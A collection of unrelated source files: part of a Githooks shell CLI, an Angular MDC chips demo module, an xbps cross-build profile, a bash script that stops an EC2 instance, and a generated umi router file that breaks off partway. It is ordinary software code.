            # The stored value appears to be a Unix timestamp. Try the GNU
            # date form (--date=@N) first; on failure fall back to the
            # BSD/macOS form (-j -f %s); if neither works, print the raw
            # value. Note: a successful `date` call prints the formatted
            # time itself, so no extra echo is needed in those branches.
            if ! date --date="@${LAST_UPDATE}" 2>/dev/null; then
                if ! date -j -f "%s" "$LAST_UPDATE" 2>/dev/null; then
                    echo "Last update timestamp: $LAST_UPDATE"
                fi
            fi
        fi
    else
        echo "! Invalid operation: \`$1\` (use \`reset\` or \`print\`)" >&2
        exit 1
    fi
}
#####################################################
# Manages the failOnNonExistingSharedHook switch.
# Prints or modifies the
#   `githooks.failOnNonExistingSharedHooks`
#   local or global Git configuration.
#####################################################
config_fail_on_not_existing_shared_hooks() {
    # The scope defaults to the repository-local configuration.
    CONFIG="--local"
    if [ -n "$2" ]; then
        if [ "$2" = "--local" ] || [ "$2" = "--global" ]; then
            CONFIG="$2"
        else
            echo "! Invalid option: \`$2\` (use \`--local\` or \`--global\`)" >&2
            exit 1
        fi
    fi

    case "$1" in
    "enable")
        if ! git config "$CONFIG" githooks.failOnNonExistingSharedHooks "true"; then
            echo "! Failed to enable \`fail-on-non-existing-shared-hooks\`" >&2
            exit 1
        fi
        echo "Failing on not existing shared hooks is enabled"
        ;;
    "disable")
        if ! git config "$CONFIG" githooks.failOnNonExistingSharedHooks "false"; then
            echo "! Failed to disable \`fail-on-non-existing-shared-hooks\`" >&2
            exit 1
        fi
        echo "Failing on not existing shared hooks is disabled"
        ;;
    "print")
        FAIL_ON_NOT_EXISTING=$(git config "$CONFIG" --get githooks.failOnNonExistingSharedHooks)
        if [ "$FAIL_ON_NOT_EXISTING" = "true" ]; then
            echo "Failing on not existing shared hooks is enabled"
        else
            # default also if it does not exist
            echo "Failing on not existing shared hooks is disabled"
        fi
        ;;
    *)
        echo "! Invalid operation: \`$1\` (use \`enable\`, \`disable\` or \`print\`)" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Manages the deleteDetectedLFSHooks default behavior.
# Modifies or prints
#   `githooks.deleteDetectedLFSHooks`
#   global Git configuration.
#####################################################
config_delete_detected_lfs_hooks() {
    if [ "$1" = "yes" ]; then
        # "a" = always delete detected LFS hooks.
        git config --global githooks.deleteDetectedLFSHooks "a"
        config_delete_detected_lfs_hooks "print"
    elif [ "$1" = "no" ]; then
        # "n" = keep the default: disable and back them up.
        git config --global githooks.deleteDetectedLFSHooks "n"
        config_delete_detected_lfs_hooks "print"
    elif [ "$1" = "reset" ]; then
        git config --global --unset githooks.deleteDetectedLFSHooks
        config_delete_detected_lfs_hooks "print"
    elif [ "$1" = "print" ]; then
        VALUE=$(git config --global githooks.deleteDetectedLFSHooks)
        # BUGFIX: the `yes` branch above stores "a", but this check only
        # accepted "Y", so `yes` was never reported as active. Accept "a"
        # (and keep "Y" in case other writers use it - confirm).
        if [ "$VALUE" = "a" ] || [ "$VALUE" = "Y" ]; then
            echo "Detected LFS hooks are by default deleted"
        else
            echo "Detected LFS hooks are by default disabled and backed up"
        fi
    else
        # BUGFIX: the message previously omitted the valid `print` operation.
        echo "! Invalid operation: \`$1\` (use \`yes\`, \`no\`, \`reset\` or \`print\`)" >&2
        exit 1
    fi
}
#####################################################
# Manages the app script folders.
#
# Returns:
#   1 on failure, 0 otherwise
#####################################################
manage_tools() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks tools register <toolName> <scriptFolder>
Install the script folder \`<scriptFolder>\` in
the installation directory under \`tools/<toolName>\`.
Currently the following tools are supported:
>> Dialog Tool (<toolName> = \"dialog\")
The interface of the dialog tool is as follows.
# if \`run\` is executable
\$ run <title> <text> <options> <long-options>
# otherwise, assuming \`run\` is a shell script
\$ sh run <title> <text> <options> <long-options>
The arguments of the dialog tool are:
- \`<title>\` the title for the GUI dialog
- \`<text>\` the text for the GUI dialog
- \`<short-options>\` the button return values, slash-delimited,
e.g. \`Y/n/d\`.
The default button is the first capital character found.
- \`<long-options>\` the button texts in the GUI,
e.g. \`Yes/no/disable\`
The script needs to return one of the short-options on \`stdout\`.
Non-zero exit code triggers the fallback of reading from \`stdin\`.
git hooks tools unregister <toolName>
Uninstall the script folder in the installation
directory under \`tools/<toolName>\`.
"
        return
    fi

    # Dispatch to the register/unregister implementation, passing the
    # remaining arguments (tool name, and for register the folder).
    TOOLS_OPERATION="$1"
    shift

    case "$TOOLS_OPERATION" in
    "register")
        tools_register "$@"
        ;;
    "unregister")
        tools_unregister "$@"
        ;;
    *)
        manage_tools "help"
        echo "! Invalid tools option: \`$TOOLS_OPERATION\`" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Installs a script folder of a tool.
#
# Returns:
#   1 on failure, 0 otherwise
#####################################################
tools_register() {
    # Only the "dialog" tool is currently supported.
    if [ "$1" != "dialog" ]; then
        echo "! Invalid operation: \`$1\` (use \`dialog\`)" >&2
        exit 1
    fi

    SCRIPT_FOLDER="$2"

    if [ ! -d "$SCRIPT_FOLDER" ]; then
        echo "! The \`$SCRIPT_FOLDER\` directory does not exist!" >&2
        exit 1
    fi

    # Normalize the folder to an absolute path.
    SCRIPT_FOLDER=$(cd "$SCRIPT_FOLDER" && pwd)

    # The tool contract requires an entry point named `run`.
    if [ ! -f "$SCRIPT_FOLDER/run" ]; then
        echo "! File \`run\` does not exist in \`$SCRIPT_FOLDER\`" >&2
        exit 1
    fi

    # Replace any previous registration of the same tool.
    if ! tools_unregister "$1" --quiet; then
        echo "! Unregister failed!" >&2
        exit 1
    fi

    TARGET_FOLDER="$INSTALL_DIR/tools/$1"

    mkdir -p "$TARGET_FOLDER" >/dev/null 2>&1 # Install new

    if ! cp -r "$SCRIPT_FOLDER"/* "$TARGET_FOLDER"/; then
        echo "! Registration failed" >&2
        exit 1
    fi
    echo "Registered \`$SCRIPT_FOLDER\` as \`$1\` tool"
}
#####################################################
# Uninstalls a script folder of a tool.
#
# Returns:
#   1 on failure, 0 otherwise
#####################################################
tools_unregister() {
    # An optional `--quiet` flag suppresses the status messages.
    [ "$2" = "--quiet" ] && QUIET="Y"

    case "$1" in
    "dialog")
        if [ -d "$INSTALL_DIR/tools/$1" ]; then
            rm -r "$INSTALL_DIR/tools/$1"
            [ -n "$QUIET" ] || echo "Uninstalled the \`$1\` tool"
        else
            [ -n "$QUIET" ] || echo "! The \`$1\` tool is not installed" >&2
        fi
        ;;
    *)
        [ -n "$QUIET" ] || echo "! Invalid tool: \`$1\` (use \`dialog\`)" >&2
        exit 1
        ;;
    esac
}
#####################################################
# Prints the version number of this script,
#   that would match the latest installed version
#   of Githooks in most cases.
#####################################################
print_current_version_number() {
    if [ "$1" = "help" ]; then
        print_help_header
        echo "
git hooks version
Prints the version number of the \`git hooks\` helper and exits.
"
        return
    fi

    # Derive the version from the release clone's checked-out commit:
    # a 6-character short hash plus a yymm.ddHHMM commit-date stamp.
    CURRENT_VERSION=$(execute_git "$GITHOOKS_CLONE_DIR" rev-parse --short=6 HEAD)
    CURRENT_COMMIT_DATE=$(execute_git "$GITHOOKS_CLONE_DIR" log -1 "--date=format:%y%m.%d%H%M" --format="%cd" HEAD)
    CURRENT_COMMIT_LOG=$(execute_git "$GITHOOKS_CLONE_DIR" log --pretty="format:%h (%s, %ad)" --date=short -1)

    print_help_header
    echo
    echo "Version: $CURRENT_COMMIT_DATE-$CURRENT_VERSION"
    echo "Commit: $CURRENT_COMMIT_LOG"
    echo
}
#####################################################
# Dispatches the command to the
#   appropriate helper function to process it.
#
# Returns:
#   1 if an unknown command was given,
#   the exit code of the command otherwise
#####################################################
choose_command() {
    CMD="$1"
    # Drop the command name so each handler receives only its own args.
    [ -n "$CMD" ] && shift

    case "$CMD" in
    "disable")
        disable_hook "$@"
        ;;
    "enable")
        enable_hook "$@"
        ;;
    "accept")
        accept_changes "$@"
        ;;
    "trust")
        manage_trusted_repo "$@"
        ;;
    "list")
        list_hooks "$@"
        ;;
    "shared")
        manage_shared_hook_repos "$@"
        ;;
    "pull")
        update_shared_hook_repos "$@"
        ;;
    "install")
        run_ondemand_installation "$@"
        ;;
    "uninstall")
        run_ondemand_uninstallation "$@"
        ;;
    "update")
        run_update_check "$@"
        ;;
    "readme")
        manage_readme_file "$@"
        ;;
    "ignore")
        manage_ignore_files "$@"
        ;;
    "config")
        manage_configuration "$@"
        ;;
    "tools")
        manage_tools "$@"
        ;;
    "version")
        print_current_version_number "$@"
        ;;
    "help")
        print_help
        ;;
    *)
        # Missing or unknown command: show the help and fail. The error
        # line is only printed when a command was actually given.
        print_help
        [ -n "$CMD" ] && echo "! Unknown command: $CMD" >&2
        exit 1
        ;;
    esac
}
# Initialize the script-wide variables (defined earlier in this script,
# not visible in this chunk) before dispatching.
set_main_variables

# Choose and execute the command
choose_command "$@"
|
import {Component, OnInit, ViewChild} from '@angular/core';
import {FormGroup, FormControl} from '@angular/forms';
import {ComponentViewer, ComponentApi} from '../../shared/component-viewer';
import {MdcChipSetChange, MdcChipSelectionEvent, MdcChipRemovalEvent, MdcChipInteractionEvent} from '@angular-mdc/web/chips';
/**
 * API documentation page for the chips package: fills the shared
 * ComponentApi viewer with the per-directive property/method/event tables.
 */
@Component({template: '<component-api></component-api>'})
export class Api implements OnInit {
  @ViewChild(ComponentApi, {static: true}) _componentApi: ComponentApi;

  ngOnInit() {
    // Static documentation data rendered by <component-api>.
    this._componentApi.docApi = {
      sections: [
        {
          header: 'MdcChipSet',
          selectors: [
            'mdc-chip-set',
          ],
          exportedAs: 'mdcChipSet',
          categories: [
            {
              name: 'Properties',
              items: [
                {name: 'choice: boolean', summary: 'Indicates that the chips in the set are choice chips, which allow a single selection from a set of options.'},
                {name: 'filter: boolean', summary: 'Indicates that the chips in the set are filter chips, which allow multiple selection from a set of options.'},
                {name: 'input: boolean', summary: 'Indicates that the chips in the set are input chips, which enable user input by converting text into chips.'},
                {name: 'touch: boolean', summary: 'Set the component touch target to 48 x 48 px.'},
              ]
            },
            {
              name: 'Methods',
              items: [
                {name: 'getSelectedChipIds(): string[]', summary: 'Returns an array of the IDs of all selected chips.'},
                {name: 'select(chipId: string): void', summary: 'Selects the chip with the given id. Deselects all other chips if the chip set is of the choice variant.'},
              ]
            },
            {
              name: 'Events',
              items: [
                {name: 'interaction: MdcChipInteractionEvent', summary: 'Indicates when a chip is interacted with (via click/tap or Enter key)'},
                {name: 'change: MdcChipSetChange', summary: 'Emitted when a chip is interacted with.'},
              ]
            },
          ]
        },
        {
          header: 'MdcChip',
          selectors: [
            'mdc-chip',
          ],
          exportedAs: 'mdcChip',
          categories: [
            {
              name: 'Properties',
              items: [
                {name: 'choice: boolean', summary: 'Indicates that the chips in the set are choice chips, which allow a single selection from a set of options.'},
                {name: 'filter: boolean', summary: 'Indicates that the chips in the set are filter chips, which allow multiple selection from a set of options.'},
                {name: 'input: boolean', summary: 'Indicates that the chips in the set are input chips, which enable user input by converting text into chips.'},
                {name: 'touch: boolean', summary: 'Set the component touch target to 48 x 48 px.'},
                {name: 'label: string', summary: 'Sets the text content of the chip.'},
                {name: 'value: string | string[]', summary: 'The value of the chip. Defaults to the content inside mdc-chip.'},
                {name: 'removable: boolean', summary: 'Sets whether a trailing icon click should trigger exit/removal of the chip. (Default is true)'},
                {name: 'disableRipple: boolean', summary: 'Whether ripples are disabled.'},
              ]
            },
            {
              name: 'Methods',
              items: [
                {name: 'focus()', summary: 'Set focus to the chip.'},
              ]
            },
            {
              name: 'Events',
              items: [
                {name: 'interactionEvent: MdcChipInteractionEvent', summary: 'Indicates the chip was interacted with (via click/tap or Enter key)'},
                {name: 'selectionChange: MdcChipSelectionEvent', summary: `Indicates the chip's selection state has changed (for choice/filter chips)`},
                {name: `removalEvent: MdcChipRemovalEvent`, summary: `Indicates the chip removal event from a chip set`},
                {name: `navigationEvent: MdcChipNavigationEvent`, summary: `Indicates a navigation event has occurred on a chip`},
                {name: `trailingIconInteraction: MdcChipInteractionEvent`, summary: `Indicates the chip's trailing icon was interacted with (via click/tap or Enter key)`},
              ]
            },
          ]
        },
        {
          header: 'MdcChipText',
          summary: 'Optional. Indicates the text content of the chip.',
          selectors: ['mdc-chip-text'],
          exportedAs: 'mdcChipText',
        },
        {
          header: 'MdcChipIcon',
          summary: 'Optional. Indicates an icon in the chip.',
          selectors: ['mdc-chip-icon'],
          exportedAs: 'mdcChipIcon',
          categories: [
            {
              name: 'Properties',
              items: [
                {name: 'leading: boolean', summary: 'Indicates a leading icon in the chip'},
                // BUGFIX: this entry previously duplicated 'leading: boolean'
                // while its summary described the trailing icon.
                {name: 'trailing: boolean', summary: 'Indicates a trailing icon in the chip'},
              ]
            }
          ]
        },
      ]
    };
  }
}
/**
 * Overview page for the Chips component: fills the shared ComponentViewer
 * with the title, description, reference links and install snippets.
 */
@Component({template: '<component-viewer></component-viewer>'})
export class Chips implements OnInit {
  @ViewChild(ComponentViewer, {static: true}) _componentViewer: ComponentViewer;

  ngOnInit(): void {
    // Static page content rendered by <component-viewer>.
    this._componentViewer.template = {
      title: 'Chips',
      description: `Chips are compact elements that allow users to enter information, select a choice, filter content, or trigger an action.`,
      references: [{
        name: 'Material Design guidelines: Chips',
        url: 'https://material.io/guidelines/components/chips.html'
      }, {
        name: 'Material Components Web',
        url: 'https://github.com/material-components/material-components-web/blob/master/packages/mdc-chips/README.md'
      }],
      mdcUrls: [
        {name: 'Sass Mixins', url: 'https://github.com/material-components/material-components-web/blob/master/packages/mdc-chips/README.md#sass-mixins'},
      ],
      code: `import {MdcChipsModule} from '@angular-mdc/web/chips';`,
      sass: `@use '@material/chips/mdc-chips';
@use '@material/chips';`
    };
  }
}
/** A food option rendered as a selectable chip in the demo examples. */
export interface ChipFood {
  /** Form value associated with the chip. */
  value: string;
  /** Human-readable label shown inside the chip. */
  viewValue: string;
}
/**
 * Live examples page for chips: holds demo state, event handlers logged to
 * the console, and the HTML/TS snippet strings shown next to each demo.
 */
@Component({templateUrl: './examples.html'})
export class Examples {
  // Demo state bound to the value / ngModel / reactive-form examples.
  demoChipValue = 'pizza-1';
  ngModelValue = 'tacos-2';
  chipForm = new FormGroup({
    chipFood: new FormControl('steak-0')
  });

  // Options rendered as chips by the *ngFor-based examples.
  foods: ChipFood[] = [
    {value: 'steak-0', viewValue: 'Steak'},
    {value: 'pizza-1', viewValue: 'Pizza'},
    {value: 'tacos-2', viewValue: 'Tacos'},
  ];

  // Event handlers wired up in examples.html; they only log to the console.
  onChipSetChange(evt: MdcChipSetChange): void {
    console.log(evt);
  }

  onChipInteraction(evt: MdcChipInteractionEvent): void {
    console.log(`MdcChipInteractionEvent: ${evt.chipId} : ${evt.value}`);
  }

  onChipSelection(evt: MdcChipSelectionEvent): void {
    console.log(`MdcChipSelectionEvent: ${evt.chipId} : ${evt.selected}`);
  }

  onChipRemoved(evt: MdcChipRemovalEvent): void {
    console.log(`MdcChipRemovalEvent: ${evt.chipId}`);
  }

  //
  // Examples
  //

  // Shared TS snippet fragment interpolated into several examples below.
  reuseFoods = `foods: ChipFood[] = [
{value: 'steak-0', viewValue: 'Steak'},
{value: 'pizza-1', viewValue: 'Pizza'},
{value: 'tacos-2', viewValue: 'Tacos'},
];`;

  exampleSimple = {
    html: `<mdc-chip-set>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text><NAME></mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
  };

  exampleInput = {
    html: `<mdc-chip-set input>
<mdc-chip label="Alice" (removalEvent)="onChipRemoved($event)">
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-icon trailing>cancel</mdc-chip-icon>
</mdc-chip>
<mdc-chip label="Bob" (removalEvent)="onChipRemoved($event)">
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-icon trailing>cancel</mdc-chip-icon>
</mdc-chip>
<mdc-chip label='Charlie' (removalEvent)="onChipRemoved($event)">
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-icon trailing>cancel</mdc-chip-icon>
</mdc-chip>
<mdc-chip label='David' (removalEvent)="onChipRemoved($event)">
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-icon trailing>cancel</mdc-chip-icon>
</mdc-chip>
</mdc-chip-set>`
  };

  exampleChoice = {
    html: `<mdc-chip-set choice>
<mdc-chip>
<mdc-chip-text>Get Directions</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Get Weather</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Add to Calendar</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
  };

  exampleFilter = {
    html: `<mdc-chip-set filter>
<mdc-chip>
<mdc-chip-text>Tops</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Bottoms</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Shoes</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-text>Accessories</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
  };

  exampleFilterWithIcon = {
    html: `<mdc-chip-set filter>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text>Alice</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text>Bob</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text>Charlie</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>face</mdc-chip-icon>
<mdc-chip-text>David</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
  };

  exampleAction = {
    html: `<mdc-chip-set>
<mdc-chip>
<mdc-chip-icon leading>wb_sunny</mdc-chip-icon>
<mdc-chip-text>Turn on lights</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>bookmark</mdc-chip-icon>
<mdc-chip-text>Bookmark</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>alarm</mdc-chip-icon>
<mdc-chip-text>Set alarm</mdc-chip-text>
</mdc-chip>
<mdc-chip>
<mdc-chip-icon leading>directions</mdc-chip-icon>
<mdc-chip-text>Get Directions</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`
  };

  exampleShape = {
    html: `<mdc-chip-set>
<mdc-chip class="custom-chip--shape-radius">
<mdc-chip-text>Turn on lights</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--shape-radius">
<mdc-chip-text>Bookmark</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--shape-radius">
<mdc-chip-text>Set alarm</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--shape-radius">
<mdc-chip-text>Get Directions</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`,
    sass: `https://raw.githubusercontent.com/trimox/angular-mdc-web/master/demos/src/styles/_chips.scss`
  };

  exampleTheme = {
    html: `<mdc-chip-set>
<mdc-chip class="custom-chip-secondary">
<mdc-chip-text>Turn on lights</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip-secondary">
<mdc-chip-text>Bookmark</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip-secondary">
<mdc-chip-text>Set alarm</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip-secondary">
<mdc-chip-text>Get Directions</mdc-chip-text>
</mdc-chip>
</mdc-chip-set>`,
    sass: `https://raw.githubusercontent.com/trimox/angular-mdc-web/master/demos/src/styles/_chips.scss`
  };

  exampleCustom = {
    html: `<mdc-chip-set>
<mdc-chip class="custom-chip--height">
<mdc-chip-text>Height</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--horizontal-padding">
<mdc-chip-text>Horizontal Padding</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--leading-icon-color">
<mdc-chip-icon leading>wb_sunny</mdc-chip-icon>
<mdc-chip-text>Leading Icon Color</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--trailing-icon-color">
<mdc-chip-text>Trailing Icon Color</mdc-chip-text>
<mdc-chip-icon trailing>wb_sunny</mdc-chip-icon>
</mdc-chip>
<mdc-chip class="custom-chip--leading-icon-size">
<mdc-chip-icon leading>wb_sunny</mdc-chip-icon>
<mdc-chip-text>Leading Icon Size</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--trailing-icon-size">
<mdc-chip-text>Trailing Icon Size</mdc-chip-text>
<mdc-chip-icon trailing>wb_sunny</mdc-chip-icon>
</mdc-chip>
<mdc-chip class="custom-chip--leading-icon-margin">
<mdc-chip-icon leading>wb_sunny</mdc-chip-icon>
<mdc-chip-text>Leading Icon Margin</mdc-chip-text>
</mdc-chip>
<mdc-chip class="custom-chip--trailing-icon-margin">
<mdc-chip-text>Trailing Icon Margin</mdc-chip-text>
<mdc-chip-icon trailing>wb_sunny</mdc-chip-icon>
</mdc-chip>
</mdc-chip-set>`,
    sass: `https://raw.githubusercontent.com/trimox/angular-mdc-web/master/demos/src/styles/_chips.scss`
  };

  // NOTE(review): this snippet binds (selectionChange) to onChipInteraction;
  // onChipSelection may have been intended - confirm against the demo page.
  exampleValue = {
    html: `<mdc-chip-set choice #chipSetValue (change)="onChipSetChange($event)" [value]="demoChipValue">
<mdc-chip *ngFor="let food of foods" [value]="food.value"
(interaction)="onChipInteraction($event)"
(selectionChange)="onChipInteraction($event)">
{{food.viewValue}}
</mdc-chip>
</mdc-chip-set>`,
    ts: `${this.reuseFoods}
demoChipValue = 'pizza-1';
onChipSetChange(evt: MdcChipSetChange): void {
// do something
}
onChipInteraction(evt: MdcChipInteractionEvent): void {
// do something
}
onChipSelection(evt: MdcChipSelectionEvent): void {
// do something
}`
  };

  exampleNgModel = {
    html: `<mdc-chip-set choice [(ngModel)]="ngModelValue">
<mdc-chip *ngFor="let food of foods" [value]="food.value">
{{food.viewValue}}
</mdc-chip>
</mdc-chip-set>`,
    ts: `ngModelValue = 'tacos-2';
${this.reuseFoods}`
  };

  exampleReactiveForm = {
    html: `<form [formGroup]="chipForm" novalidate>
<mdc-chip-set choice formControlName="chipFood">
<mdc-chip *ngFor="let food of foods" [value]="food.value">
{{food.viewValue}}
</mdc-chip>
</mdc-chip-set>
</form>`,
    ts: `${this.reuseFoods}
chipForm = new FormGroup({
chipFood: new FormControl('steak-0')
});`
  };

  exampleAccessibility = {
    html: `<div class="mdc-touch-target-wrapper">
<mdc-chip touch label="My Accessibility Chip"></mdc-chip>
</div>`
  };
}
|
# Cross-build profile: compiler flags and target triplet for
# aarch64 (ARMv8-A) builds against musl libc.
XBPS_TARGET_CFLAGS="-march=armv8-a"
XBPS_TARGET_CXXFLAGS="$XBPS_TARGET_CFLAGS"
XBPS_TARGET_FFLAGS=""
XBPS_TRIPLET="aarch64-unknown-linux-musl"
|
#! /bin/bash
# Stop an EC2 instance identified by its Name tag.
read -p "Enter instance name: " INAME
if [ -z "$INAME" ]; then
    printf '%s\n' "An instance name is needed"
    exit 1
fi
# Resolve the instance id(s) from the Name tag. $(...) instead of
# backticks; the filter value is passed through a double-quoted string.
IID=$(aws ec2 describe-instances --filters "Name=tag:Name,Values=$INAME" \
    --output text --query 'Reservations[*].Instances[*].InstanceId')
# Guard: without this check an empty result would invoke
# stop-instances with no ids and produce a confusing CLI error.
if [ -z "$IID" ]; then
    printf '%s\n' "No instance found with name: $INAME"
    exit 1
fi
echo "Stopping instance named $INAME with id $IID"
# $IID is intentionally unquoted: several matching instances come back
# whitespace-separated and word-splitting passes each id separately.
aws ec2 stop-instances --instance-ids $IID
|
<filename>src/pages/.umi/router.js
import React from 'react';
import { Router as DefaultRouter, Route, Switch } from 'react-router-dom';
import dynamic from 'umi/dynamic';
import renderRoutes from 'umi/lib/renderRoutes';
import history from '@tmp/history';
import RendererWrapper0 from '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/.umi/LocaleWrapper.jsx';
import _dvaDynamic from 'dva/dynamic';
const Router = require('dva/router').routerRedux.ConnectedRouter;
const routes = [
{
path: '/user',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "layouts__UserLayout" */ '../../layouts/UserLayout'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../../layouts/UserLayout').default,
routes: [
{
path: '/user',
redirect: '/user/login',
exact: true,
},
{
path: '/user/login',
name: 'login',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__User__models__register.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/User/models/register.js').then(
m => {
return { namespace: 'register', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__User__Login" */ '../User/Login'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../User/Login').default,
exact: true,
},
{
path: '/user/register',
name: 'register',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__User__models__register.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/User/models/register.js').then(
m => {
return { namespace: 'register', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__User__Register" */ '../User/Register'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../User/Register').default,
exact: true,
},
{
path: '/user/register-result',
name: 'register.result',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__User__models__register.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/User/models/register.js').then(
m => {
return { namespace: 'register', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__User__RegisterResult" */ '../User/RegisterResult'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../User/RegisterResult').default,
exact: true,
},
{
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "p__404" */ '../404'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../404').default,
exact: true,
},
{
component: () =>
React.createElement(
require('/Users/mac/Desktop/WebUI/briup/day05/ej/node_modules/umi-build-dev/lib/plugins/404/NotFound.js')
.default,
{ pagesPath: 'src/pages', hasRoutesInConfig: true },
),
},
],
},
{
path: '/',
component: __IS_BROWSER
? _dvaDynamic({
component: () =>
import(/* webpackChunkName: "layouts__BasicLayout" */ '../../layouts/BasicLayout'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../../layouts/BasicLayout').default,
Routes: [require('../Authorized').default],
routes: [
{
path: '/',
redirect: '/dashboard/analysis',
authority: ['admin', 'user'],
exact: true,
},
{
path: '/dashboard',
name: 'dashboard',
icon: 'dashboard',
routes: [
{
path: '/dashboard/analysis',
name: 'analysis',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__Dashboard__models__activities.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/activities.js').then(
m => {
return { namespace: 'activities', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__chart.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/chart.js').then(
m => {
return { namespace: 'chart', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__monitor.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/monitor.js').then(
m => {
return { namespace: 'monitor', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__Dashboard__Analysis" */ '../Dashboard/Analysis'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Dashboard/Analysis').default,
exact: true,
},
{
path: '/dashboard/monitor',
name: 'monitor',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__Dashboard__models__activities.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/activities.js').then(
m => {
return { namespace: 'activities', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__chart.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/chart.js').then(
m => {
return { namespace: 'chart', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__monitor.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/monitor.js').then(
m => {
return { namespace: 'monitor', ...m.default };
},
),
],
component: () =>
import(/* webpackChunkName: "p__Dashboard__Monitor" */ '../Dashboard/Monitor'),
LoadingComponent: require('/Users/mac/Desktop/WebUI/briup/day05/ej/src/components/PageLoading/index')
.default,
})
: require('../Dashboard/Monitor').default,
exact: true,
},
{
path: '/dashboard/workplace',
name: 'workplace',
component: __IS_BROWSER
? _dvaDynamic({
app: require('@tmp/dva').getApp(),
models: () => [
import(/* webpackChunkName: 'p__Dashboard__models__activities.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/activities.js').then(
m => {
return { namespace: 'activities', ...m.default };
},
),
import(/* webpackChunkName: 'p__Dashboard__models__chart.js' */ '/Users/mac/Desktop/WebUI/briup/day05/ej/src/pages/Dashboard/models/chart.js').then(
m => {
return { namespace: 'chart', ...m.default };
},
),
